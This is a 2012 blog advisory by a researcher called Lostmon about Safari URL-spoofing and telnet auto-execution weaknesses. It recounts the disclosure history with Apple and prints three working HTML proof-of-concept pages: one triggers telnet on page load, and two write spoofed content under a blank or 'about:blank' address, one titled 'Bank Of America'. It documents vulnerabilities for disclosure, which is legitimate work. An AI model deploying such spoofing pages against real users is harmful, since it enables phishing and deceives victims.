Safari for windows and IOS URL weakness

Friday, March 23, 2012
#####################################
Safari for windows and Ios Url Spoof
Vendor URL: http://www.apple.com
Advisore:http://lostmon.blogspot.com/2012/03/safari-for-windows-and-ios-url-weakness.html
Vendor notify: YES PoC available: YES
#####################################

#############
History
#############

Yesterday i read a New about safari for IOS
Url spoof vulnerability at http://iclarified.com/entry/comments.php?enid=20858
I want to clarify that i had report this vulnerabiliy in 12/03/2011 to apple 
product security across MSVR. (i had the mails that demostrate it)

So apple Don't patch it and this vuln is one year old.

I had report to a telnet automatic execution in safari for windows...
and they have patch in silence ... no credits no info...

THis is the response about telnet execution from apple:

" Issue 1:  We do not see any security implications with allowing telnet connections.  
There is an existing enhancement request for OS X to provide a warning dialog."

Yes but not in windows and if you doing apps for windows you can't say it does not work in OS X. It works in Safari for windows prior to 5.1.4

Issue 2: URL Spoof 

I have found few times a go a RCE in IE 6, 7 and 8 see MS011-57
also it affects to Qtweb browser and safari for windows 
i report it to apple and sit quiet and wait till apple patch.

So whats happened?¿ after a year of report he vuln continue working and other 
researchers had publish it ( http://majorsecurity.net )
but i like to clarify that i report it to apple one year a go !!!

Response from apple:

"Issue 2:  The outside third party you are coordinating with already sent this issue to us on January 10, 2011.  It does not appear possible to spoof arbitrary URLs in the address bar (i.e. while the title may say "Bank of America" in the proof-of-concept, you can't spoof the address bar to read https://bankofamerica.com) Given that the most serious impact of this issue is that you can prevent the userfrom using the address bar in the newly created tab, we do not have a timetabletoresolve this issue."

look his PoC / exploit and look my code PoC 

His code => http://majorsecurity.net/html5/ios51-demo.html
My code => http://lostmon.blogspot.com/2011/10/qtweb-internet-browser-url-weakness.html
this is the similar code that i had report to apple.


Bad Words for apple on security !!!!!!!!!!! and bad work with security researchers :/

################
Sample codes
################

############ BOF Safari.html #################

<html><title>Safari unauth telnet execution by lostmon</title>
<script type="text/javascript" language="javascript">
function redirect()    {
location.replace("telnet:192.168.1.1");
}
</script>
<body onLoad="redirect();">
</body>
</html>
############### EOF ################

2- URL Spoof or about:blank spoof
This issue can use to spoof url locations or to show fake content in
without any URL in the address bar
- open the PoC and click in Invoke PoC and look at the address bar, it
does not show any url....(safari2.html)
-open the PoC and click in invokePoC (safari3.html) Look at addressbar
it shows "about:blank" but itn't at about:blank.
and look at the page title :) This can use to spoof content.


############## BOF safari2.html #################

<html>
<head>
 <title>About:blank Url spoofing using document.open() testcase</title>
 <script type="text/javascript"><!--

var wx;
function invokePoC() {
 wx = open("","newwin");
 setInterval("doit()",1);
}

function doit() {
 wx.document.open();
 wx.document.write('OWNED OWNED OWNED');
}

// -->
 </script>
</head>
<body>
<h1>About:blank Url spoofing using document.open() testcase</h1>
<noscript><p>this testcase requires JavaScript to run.</p></noscript>
<p><a href="javascript:invokePoC();">invoke PoC</a></p>

</body>
</html>

################# EOF ################################

#################### BOF safari3.html ###################

<html>
<head>
 <title>About:blank Url spoofing using document.open() testcase</title>
 <script type="text/javascript"><!--

var wx;
function invokePoC() {
 wx = open("about:blank","newwin");
 setInterval("doit()",1);
}

function doit() {
 wx.document.open();
 wx.document.write('<html><title>Bank Of America</title>OWNED OWNED
OWNED<br></html>');
}

// -->
 </script>
</head>
<body>
<h1>About:blank Url spoofing using document.open() testcase</h1>
<noscript><p>this testcase requires JavaScript to run.</p></noscript>
<p><a href="javascript:invokePoC();">invoke PoC</a></p>

</body>
</html>
##################### EOF ##############################

I would like to thnx MSVR for his preocupation on this issue and for talk about it with apple. MSVR is a Very Good program and they do A VERY GOOD WORK on security !!!!!
-- 
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....


Latest OSVDB Vulnerabilities

 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...